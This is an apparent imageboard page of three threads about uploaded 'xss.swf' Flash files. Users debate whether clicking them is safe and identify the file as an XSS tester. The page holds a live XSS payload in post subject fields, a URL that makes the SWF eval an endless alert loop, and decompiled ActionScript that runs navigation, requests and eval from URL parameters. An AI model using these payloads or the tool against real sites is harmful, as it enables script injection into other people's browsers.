Threads (3):
File: test.swf-(5 KB, 550x400, Other)
[_] Johnyfffffffff Johnyfffffffff 2398195 Johnyfffffffff
>> [_] Anon 2398221 I don't think the xss worked on me. noscript for lyfe. cool shit though
>> [_] Anon 2398250 This is what I got. Latest Mozilla Firefox (29.0.1). NoScript not installed. http://gyazo.com/db0e942bad7c0a83aa6600a6d3f8fd3d
>> [_] Anon 2398253 I don't know if I like what this stuff is supposed to do, because I do not know what it is supposed to do.
File: xss.swf-(5 KB, 550x400, Other)
[_] "><img src=x onerror=alert(1)> LALKA"><img src=x onerror=alert(1)> 2380367 "><img src=x onerror=alert(1)>
>> [_] Anon 2380380 >># I am afraid to click.
>> [_] Anon 2380382 >># Someone click and post results if possible
>> [_] Anon 2380384 >># Here goes.
>> [_] Anon 2380387 >># Just some instructions on how to link things.
>> [_] Anon 2380389 I used the embed button out of fear. Nothing happened, and scans seem to indicate it didn't do anything either. It was saying repeatedly "lol! cool :3" on another /f/ thread.
>> [_] Anon 2380391 >># Open it with Google Chrome, it displays some kind of instructions.
>> [_] Anon 2380393 >># >># Honestly?
>> [_] Anon 2380394 >># Yup.
>> [_] Anon 2380395 http://i.4cdn.org/f/xss.swf?a=eval&c=while(true){alert(%22hello!%20:3%22)}
>> [_] Anon 2380397 Wow, okay. That's... neat.
>> [_] Anon 2380438 >># Correction: it displays instructions in an alert window.
>> [_] Anon 2380441 Decompiled. It's an xss vulnerability tester. Nothing bad here.
public function attack(param1) {
    var _loc_2:URLLoader = null;
    var _loc_3:String = null;
    switch(param1){
        case "location":{
            navigateToURL(new URLRequest(this.cmd), "_self");
            break;
        }
        case "open":{
            navigateToURL(new URLRequest(this.cmd), "_blank");
            break;
        }
        case "get":{
            _loc_2 = new URLLoader(new URLRequest(this.cmd));
            _loc_2.addEventListener(Event.COMPLETE, this.get_complete);
            _loc_2.addEventListener(SecurityErrorEvent.SECURITY_ERROR, this.get_sec_error);
            break;
        }
        case "eval":{
            ExternalInterface.call("eval", this.cmd);
            break;
        }
>> [_] Anon 2380442 >>#
        default:{
            _loc_3 = "a(action) - c(cmd)\n";
            _loc_3 = _loc_3 + "-----------------\n";
            _loc_3 = _loc_3 + "1. location to url: xss.swf?a=location&c=http://www.google.com/\n";
            _loc_3 = _loc_3 + "2. open url to new window: xss.swf?a=open&c=http://www.google.com/\n";
            _loc_3 = _loc_3 + "3. http request to url: xss.swf?a=get&c=http://www.google.com/\n";
            _loc_3 = _loc_3 + "4. eval js codz: xss.swf?a=eval&c=alert(document.domain)\n";
            _loc_3 = _loc_3 + "-----------------\n";
            _loc_3 = _loc_3 + "by evilcos@gmail.com";
            ExternalInterface.call("alert", _loc_3);
            break;
            break;
        }
    }
    stop();
    return;
}
>> [_] Anon 2380449 it opened a gmail window weird
>> [_] Anon 2380486 >># What did you use for that, if you don't mind?
File: xss.swf-(5 KB, 550x400, Other)
[_] test test 2375252 test
>> [_] Anon 2375263 gj anon
>> [_] Anon 2375268 and the point of that was?
>> [_] Anon 2375269 Nice try, not clicking that button.
>> [_] Anon 2375280 I'M BEING HACKED HELP
>> [_] Anon 2375328
>https://github.com/evilcos/xss.swf
>5 KB
Most likely not even his. It's supposed to open to www.google.com to check for SWF vulnerability.